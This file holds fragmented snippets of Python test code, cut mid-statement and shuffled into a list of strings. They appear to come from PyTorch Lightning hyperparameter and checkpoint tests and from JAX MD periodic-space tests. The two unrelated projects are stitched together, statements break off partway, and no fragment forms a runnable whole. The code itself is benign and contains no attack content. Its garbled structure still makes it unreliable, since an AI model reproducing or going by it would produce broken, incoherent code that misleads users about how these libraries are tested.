# test proper property assignments", "= torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179", "def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1, 'key2': 'abc'}) pkl =", "torch.nn.CosineEmbeddingLoss) if isinstance(model, DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] ==", "= 1234 self.save_hyperparameters() # this is intentionally here at the", "cls, config): # \"\"\" Test that the model automatically saves", "_raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x for", "{'train_loss': loss}} def configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel,", "any_other_loss = torch.nn.CrossEntropyLoss() def __init__(self, *args, subclass_arg=1200, **kwargs): super().__init__(*args, **kwargs)", "takes only valid class arguments.\"\"\" class LocalModel(EvalModelTemplate): def __init__(self, batch_size=15):", "model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) # config specific tests assert model.hparams.test_arg2", "arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14,", "@pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate() # verify", "return torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self, batch, batch_nb): x, y =", "SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir, cls): \"\"\" Test", "raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] ==", "lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test", "model.hparams assert model.hparams['arg1'] == 'overwritten' assert model.hparams['arg2'] == 2 #", "on passing unsupported config type. \"\"\" with pytest.raises(ValueError): _ =", "pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml from pytorch_lightning.utilities import AttributeDict, is_picklable from", "1234 super().__init__(*args, **kwargs) # this is intentionally here at the", "test_arg=78) assert model3.hparams.test_arg == 78 return raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel])", "= cls(batch_size=179, **extra_args) assert model.hparams.batch_size == 179 if isinstance(model, SubClassEvalModel):", "= 'overwritten' local_var = 1234 super().__init__(*args, **kwargs) # this is", "model = cls(hparams=conf) assert isinstance(model.hparams, Container) # run standard test", "be pickled. \"\"\" def __init__(self, foo='bar', pickle_me=(lambda x: x +", "# verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2)", "test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that a model can take regular args", "_run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls): #", "the License. import os import pickle from argparse import Namespace", "raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] ==", "super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')),", "it should be assigned # assert model.hparams.my_arg == 42 #", "self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel): def __init__(self, **kwargs): super().__init__() self.hparams = kwargs", "max_epochs=1) trainer.fit(model) # make sure the raw checkpoint saved the", "the end. \"\"\" def __init__(self, arg1, arg2, *args, **kwargs): super().__init__(*args,", "run standard test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel])", "has an attribute that cannot be pickled. \"\"\" def __init__(self,", "\"\"\" This model has the super().__init__() call at the end.", "intentionally not set arg1 = 'overwritten' local_var = 1234 self.save_hyperparameters()", "F.cross_entropy(self(x), y) return {'loss': loss, 'log': {'train_loss': loss}} def configure_optimizers(self):", "Test fail on passing unsupported config type. \"\"\" with pytest.raises(ValueError):", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint", "class init return raw_checkpoint_path # ------------------------- # SPECIFIC TESTS #", "unexpected keyword argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs):", "LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert 'non_exist_kwarg' not in model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def", "that model loads correctly model = cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size ==", "should be assigned # assert model.hparams.my_arg == 42 # #", "cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg == 42 class AnotherArgModel(EvalModelTemplate): def __init__(self,", "# SPECIFIC TESTS # ------------------------- def test_class_nesting(): class MyModule(LightningModule): def", "raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint", "batch loss = F.cross_entropy(self(x), y) return {'loss': loss, 'log': {'train_loss':", "limit_test_batches=2, max_epochs=1, ) trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams =", "assert model3.hparams.test_arg == 78 return raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "= None # pretend EvalModelTemplate did not call self.save_hyperparameters() self.hparams", "AttributeDict, is_picklable from tests.base import EvalModelTemplate, TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate):", "assert model.hparams.my_arg == 42 class AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__()", "OmegaConf.create(dict(my_arg=42))), # ]) # def test_single_config_models(tmpdir, cls, config): # \"\"\"", "model = SubClassVarArgs(hparams) trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path =", "pkl = cloudpickle.dumps(ad) assert ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\"", "standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls) model2 =", "dict(my_arg=42)), # (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel, dict(my_arg=42)),", "mylist=[15.4, dict(a=1, b=2)])) model = cls(hparams=conf) assert isinstance(model.hparams, Container) #", "== 78 return raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls):", "]) def test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests that only the arguments are", "an attribute that cannot be pickled. \"\"\" def __init__(self, foo='bar',", "\"\"\" Loading this model should accept hparams and init in", "test_explicit_args_hparams(tmpdir): \"\"\" Tests that a model can take implicit args", "super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1,", "model.hparams.batch_size == 179 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) if", "the properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key] =", "self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ])", "== 'anything' # verify that we can overwrite whatever we", "Version 2.0 (the \"License\"); # you may not use this", "# # verify that the checkpoint saved the correct values", "model.hparams.test_arg2 == 120 def test_implicit_args_hparams(tmpdir): \"\"\" Tests that a model", "assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 # verify", "raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 # verify that model loads correctly model", "self.save_hyperparameters() self.hparams = hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this model", "UnsafeParamModel(LocalFileSystem(tmpdir)) trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, )", "raw_checkpoint_paths = [x for x in raw_checkpoint_paths if '.ckpt' in", "# assert model.hparams.my_arg == 42 # # # verify that", "model2.hparams.test_arg == 14 assert isinstance(model2.hparams, hparam_type) if try_overwrite: # verify", "download=True), batch_size=32) trainer.fit(model, train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32)", "EvalModelTemplate did not call self.save_hyperparameters() self.hparams = hparams class SubClassVarArgs(SuperClassPositionalArgs):", "= Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint =", "= raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate):", "= cls(config) # # # no matter how you do", "checkpoint saved the correct values # trainer = Trainer(default_root_dir=tmpdir, max_epochs=2,", "in model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams): super().__init__() self._hparams =", "by applicable law or agreed to in writing, software #", "model.hparams.subclass_arg == 1200 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) #", "not local variables. \"\"\" model = cls(arg1=1, arg2=2) assert 'local_var'", "checkpoint saved the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model)", "the arguments passed into the constructor \"\"\" # model =", "extra_args = {} if cls is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls", "Namespace import cloudpickle import pytest import torch from fsspec.implementations.local import", "cls): # init model model = cls(hparams=Namespace(test_arg=14)) # run standard", "self.hparams = hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this model should", "super().__init__() class SimpleNoArgsModel(LightningModule): def __init__(self): super().__init__() self.l1 = torch.nn.Linear(28 *", "can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) # make", "always nn.Module a = MyModule() assert isinstance(a, torch.nn.Module) def test_outside():", "\"\"\"Test that we save/export only the initial hparams, no other", "super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs):", "'test_arg2') model = LocalModel(test_arg=14, test_arg2=90) # run standard test suite", "class MyModule(LightningModule): def forward(self): ... # make sure PL modules", "model = LocalModel(test_arg=14, test_arg2=90) # run standard test suite raw_checkpoint_path", "== 120 def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that a model can", "__init__(obj, *more_args, other_arg=300, **more_kwargs): # intentionally named obj super().__init__(*more_args, **more_kwargs)", "def test_single_config_models(tmpdir, cls, config): # \"\"\" Test that the model", "# ------------------------- def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False): \"\"\" Tests for", "hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__() class SimpleNoArgsModel(LightningModule): def __init__(self):", "self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir)) trainer = Trainer( default_root_dir=tmpdir,", "= os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model", "LocalModel(test_arg=14, test_arg2=90) # run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir,", "with pytest.raises(TypeError, match=\"__init__\\(\\) got an unexpected keyword argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path)", "save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml)", "applicable law or agreed to in writing, software # distributed", "UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that has unconventional names for \"self\",", "# verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)", "def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def __init__(self, arg1,", "test_outside() A().test2() A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss = torch.nn.CrossEntropyLoss() def __init__(self,", "AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) ==", "= MyModule() assert isinstance(a, torch.nn.Module) def test_outside(): a = MyModule()", "arg1, arg2, *args, **kwargs): super().__init__(*args, **kwargs) self.argument1 = arg1 #", "model.hparams.batch_size == 99 def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath)", "back the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path) # verify that model loads", "1234 self.save_hyperparameters() # this is intentionally here at the end", "that has unconventional names for \"self\", \"*args\" and \"**kwargs\". \"\"\"", "# verify that we can overwrite whatever we want raw_checkpoint_path", "'abc'}) pkl = pickle.dumps(ad) assert ad == pickle.loads(pkl) pkl =", "= batch loss = F.cross_entropy(self(x), y) return {'loss': loss, 'log':", "# You may obtain a copy of the License at", "**kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel,", "15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests that a model can take", "is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir,", "torch.nn import functional as F from torch.utils.data import DataLoader from", "= AttributeDict({'key1': 1, 'key2': 'abc'}) pkl = pickle.dumps(ad) assert ad", "hparams): super().__init__() self._hparams = None # pretend EvalModelTemplate did not", "# verify that model loads correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123)", "inheritance: super class takes positional arg, subclass takes varargs. \"\"\"", "hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir,", "test proper property assignments assert model.hparams.test_arg == 14 # verify", "with pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed from hparams because it cannot", "take an object with explicit setter \"\"\" def __init__(self, hparams):", "class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model has the _auto_collect_arguments() call at", "config specific tests assert model.hparams.test_arg2 == 120 def test_explicit_missing_args_hparams(tmpdir): \"\"\"", "__init__(self, arg1, arg2, *args, **kwargs): self.argument1 = arg1 # arg2", "import functional as F from torch.utils.data import DataLoader from pytorch_lightning", "save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self):", "proper property assignments assert model.hparams.test_arg == 14 # verify we", "takes varargs. \"\"\" hparams = dict(test=1) model = SubClassVarArgs(hparams) trainer", "hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a model", "hparams): super().__init__() self.hparams = hparams # ------------------------- # STANDARD TESTS", "AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that the checkpoint saved", "assert model.hparams['arg2'] == 2 # @pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel, Namespace(my_arg=42)),", "import OmegaConf, Container from torch.nn import functional as F from", "for x in raw_checkpoint_paths if '.ckpt' in x] assert raw_checkpoint_paths", "\"License\"); # you may not use this file except in", ") trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert", "overfit_batches=0.5) trainer.fit(model) # make sure the raw checkpoint saved the", "= Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\)", "[RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we save/export only", "train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the model", "LocalModel(EvalModelTemplate): def __init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel() assert", "def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that", "raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x for x in raw_checkpoint_paths", "raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path) # verify", "Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) # make sure the raw checkpoint", "y = batch loss = F.cross_entropy(self(x), y) return {'loss': loss,", "Tests for the existence of an arg 'test_arg=14' \"\"\" hparam_type", "# raw_checkpoint_path = _raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path) # assert", "cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate() #", "SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this model should accept hparams and init", "test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate() # verify we can train", "hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def", "Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model) # # # verify that", "test_single_config_models(tmpdir, cls, config): # \"\"\" Test that the model automatically", "== hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams))", "assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that the checkpoint saved the", "argparse import Namespace import cloudpickle import pytest import torch from", "trainer = Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True,", "self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take", "isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that the checkpoint" ]
[ "disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R))", "for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension, dtype): key =", "box_format) deformed_box = box * 0.9 R_new = s_g(R, grad(E_g)(R),", "Issue #5849.') N = 16 R_f, R, box, (s, E),", "box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if box_format", "* random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1 *", "2.0 (the \"License\"); # you may not use this file", "spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13 if dtype", "split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R, R) dR_wrapped =", "= space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct =", "fails due to JAX Issue #5849.') N = 16 R_f,", "box_format in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N =", "= random.PRNGKey(0) tol = 1e-13 if dtype is f32: tol", "# https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "permissions and # limitations under the License. \"\"\"Tests for jax_md.space.\"\"\"", "box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N =", "= 0.5 * random.normal( split_T0_dT, (spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0", "E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R),", "for _ in range(STOCHASTIC_SAMPLES): key, split = random.split(key) R =", "random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R),", "shift = space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T, wrapped=False) displacement =", "dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if box_format == 'scalar':", "= grad(lambda R: jnp.sum(disp_fn(R, R) ** 2)) general_grad_fn = grad(lambda", "BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "box = jnp.array(jnp.eye(dim) * box_size, dtype) d, s = space.periodic(jnp.diag(box)", "= random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv = space.inverse(T) R_test", "metric = space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric", "+ dtransform_1), dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn, true_shift_fn =", "box_format) @grad def box_energy_g_fn(box): return E_g(R, new_box=box) @grad def box_energy_gf_fn(box):", "box_size, dtype) elif box_format == 'matrix': box = jnp.array(jnp.eye(dim) *", "_ in range(SHIFT_STEPS): key, split = random.split(key) dR = random.normal(", "of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless", "= jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted <", "in range(STOCHASTIC_SAMPLES): key, split_R, split_T = random.split(key, 3) dT =", "dtype self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R, dR) * box_size) assert shift_fn(R_scaled,", "License for the specific language governing permissions and # limitations", "split_R, split_dR = random.split(key, 4) size_0 = 10.0 * random.uniform(split_T0_scale,", "jnp.where( dr_shifted < dr_direct, dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype)", "[2, 3] BOX_FORMATS = ['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE", "unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0)) assert", "random.PRNGKey(0) displacement, _ = space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric =", "spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for _", "== dtype self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R, dR) * box_size) assert", "absl.testing import parameterized from jax.config import config as jax_config from", "dr_direct, dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype ==", "jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return R_f, R,", "jnp.where(dR < -0.49, f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0), R, dR)", "space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where(dr_shifted", "= jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT =", "= space.periodic_general(box) d_g, s_g = space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0)", "dtype=dtype) tol = 1e-13 if dtype is f32: tol =", "= space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn", "= jnp.diag(box_size) R = random.uniform( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled", "dR + jnp.array([i, j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted =", "spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "= random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 =", "= box * 0.9 R_new = s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_energy(self,", "'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format': box_format } for", "= 1e-13 if dtype is f32: tol = 2e-5 for", "R, box, (s, E), (s_gf, E_gf), (s_g, E_g) # pylint:", "grad(E_g)(R), new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list(", "OF ANY KIND, either express or implied. # See the", "SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "See the License for the specific language governing permissions and", "to in writing, software # distributed under the License is", "R_prime = space.transform(T, R) energy_direct = lambda R: jnp.sum(R **", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 = R unwrapped_R = R displacement,", "key, split_T1_scale, split_T1_dT = random.split(key, 3) key, split_t, split_R, split_dR", "== R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "deformed_box = box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f,", "or agreed to in writing, software # distributed under the", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension,", "E), (s_gf, E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype,", "box_energy_gf_fn(box): return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box)) if __name__ == '__main__':", "T_inv = space.inverse(T) R_test = space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test)", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype, box_format):", "obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0", "R = shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R,", "box_size, dtype) d, s = space.periodic(jnp.diag(box) if box_format == 'matrix'", "key, split = random.split(key) dR = random.normal( split, (PARTICLE_COUNT, spatial_dimension),", "3] BOX_FORMATS = ['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE =", "compliance with the License. # You may obtain a copy", "key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype,", "= \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) @grad def box_energy_g_fn(box): return", "key, split1, split2 = random.split(key, 3) R = random.uniform( split1,", "return R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g)", "dtype=dtype) T_inv = space.inverse(T) R_test = space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R,", "space.map_product(true_disp_fn) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR =", "jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT = random.split(key,", "key, split_R, split_T = random.split(key, 3) dT = random.normal( split_T,", "R0)) assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R < 1))", "functools import partial from unittest import SkipTest 